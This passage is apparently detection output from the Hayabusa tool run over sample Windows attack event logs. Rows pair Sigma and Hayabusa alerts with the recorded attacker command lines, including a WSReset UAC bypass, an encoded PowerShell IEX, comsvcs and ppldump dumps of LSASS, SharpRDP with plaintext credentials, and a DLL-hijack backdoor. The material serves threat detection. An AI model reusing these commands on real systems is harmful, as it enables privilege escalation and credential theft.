WSReset.exe,,rules/sigma/process_creation/win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\reg.exe add 
HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: sihost.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x38f87e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch 
-p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Suspicious 
Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))"""""" : Path: C:\Windows\System32\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx +2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx +2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript c:\ProgramData\memdump.vbs notepad.exe : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,WScript or CScript 
Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx +2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP 
Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx +2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3461203602-4096304019-2269080069-501 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-20 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\sqlsvc : Parent Command: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Security log was 
cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,informational,Logoff,User: ANONYMOUS LOGON : LogonID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,FileProtocolHandler ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,FileProtocolHandler ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,OpenURL ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,OpenURL ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /c start ms-browser:// : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c start ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: explorer ms-browser:// : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning 
Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password : Path: C:\ProgramData\USOShared\SharpRDP.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Furutaka.exe dummy2.sys : Path: C:\Users\Public\BYOV\TDL\Furutaka.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: ppldump.exe -p lsass.exe -o a.png : Path: C:\Users\Public\BYOV\ZAM64\ppldump.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: usoclient StartInteractiveScan : Path: C:\Windows\System32\UsoClient.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.980 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s 